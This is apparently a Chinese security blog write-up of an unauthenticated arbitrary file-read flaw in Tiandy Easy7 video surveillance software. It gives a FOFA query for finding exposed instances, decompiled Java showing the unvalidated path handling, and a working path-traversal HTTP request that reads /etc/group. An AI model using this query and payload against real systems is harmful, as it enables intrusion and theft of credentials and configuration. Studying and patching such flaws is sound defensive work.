天地伟业Easy7 downloadResource 文件读取漏洞


漏洞简介

天地伟业Easy7是一款用于视频监控管理的软件系统。

该系统的/Easy7/rest/file/downloadResource接口存在前台任意文件读取漏洞,攻击者通过构造恶意路径参数(如/etc/passwd)可读取服务器上的任意文件,可能导致敏感信息泄露(如系统配置文件、用户凭证等)。由于天地伟业产品多用于关键基础设施领域,若存在公网暴露实例,可能带来严重的安全风险。

影响版本

fofa语法

body="/Easy7/apps/WebService/LogIn.jsp" || body="Easy7/VideoLib.EXE" || body="/Easy7/index.html" || (body="<img src=\"./images/ico/Easy7_logo_transparent.png") && title="平台"

漏洞分析

首先,该系统基于Spring 3.0,比较古老且WEB-INF/web.xml里没有配置任何filter进行权限校验,因此绝大部分接口都是可以直接访问的。

再来看本次的漏洞接口 /Easy7/rest/file/downloadResource 的对应方法downloadResource()的实现逻辑

@Controller
@RequestMapping({"/file"})
public class CLS_REST_File {
    @Resource(
        name = "boSystemInfo"
    )
    private CLS_BO_SystemInfo boSystemInfo;
    @Resource(
        name = "boFile"
    )
    private CLS_BO_File boFile;
    @Resource(
        name = "boPROXY"
    )
    private CLS_BO_PROXY boPROXY;
    private static final Log log = LogFactory.getLog(CLS_REST_File.class);

    @RequestMapping({"/downloadResource"})
    public void downloadResource(HttpServletRequest request, HttpServletResponse response, CLS_VO_UploadFile voFile) throws IOException {
        String pathId = voFile.getSrsPathId();
        String path = voFile.getPath();
        String imagePath = Tools.getLocalPath(pathId) + path;
        CLS_VO_Result result = new CLS_VO_Result();
        String newPath = imagePath.replace("\\", "/");
        String retFilename = newPath.substring(newPath.lastIndexOf("/"));
        File isFile = new File(newPath);
        if (!isFile.exists()) {
            result.setRet(-7);
            response.getWriter().print("<script>alert(\"未找到资源\");window.close();</script>");
        } else {
            ServletOutputStream out = response.getOutputStream();
            response.setHeader("Content-disposition", "attachment;filename=" + retFilename);
            BufferedInputStream bis = null;
            BufferedOutputStream bos = null;

            try {
                InputStream inputStream = new FileInputStream(newPath);
                bis = new BufferedInputStream(inputStream);
                bos = new BufferedOutputStream(out);
                byte[] buff = new byte[2048];

                int bytesRead;
                while((bytesRead = bis.read(buff, 0, buff.length)) != -1) {
                    bos.write(buff, 0, bytesRead);
                }

其中 Tools.getLocalPath(pathId) 的实现逻辑如下

public static String getLocalPath(String sSrsSharePathId) {
    return "/root/srsPath/" + sSrsSharePathId;
}

对与参数srsPathId没有任何过滤或校验,因此可以目录穿越到其他目录,且参数path也没有任何校验,最终将imagePath的反斜杠替换成斜杠后直接传递进new FileInputStream(newPath);中进行文件操作,整个过程无任何校验或过滤,因此造成任意文件读取漏洞。

漏洞复现

POST /Easy7/rest/file/downloadResource HTTP/1.1
Host: easy7.mrxn.net
Content-Type: application/x-www-form-urlencoded

path=group&srsPathId=../../etc/

成功读取到/etc/group文件内容


手机扫码阅读

东胜物流软件 OpSailingDateListHtmlGridSource.aspx SQL注入漏洞

天地伟业Easy7 queryDataByTypeEx SQL注入漏洞

评 论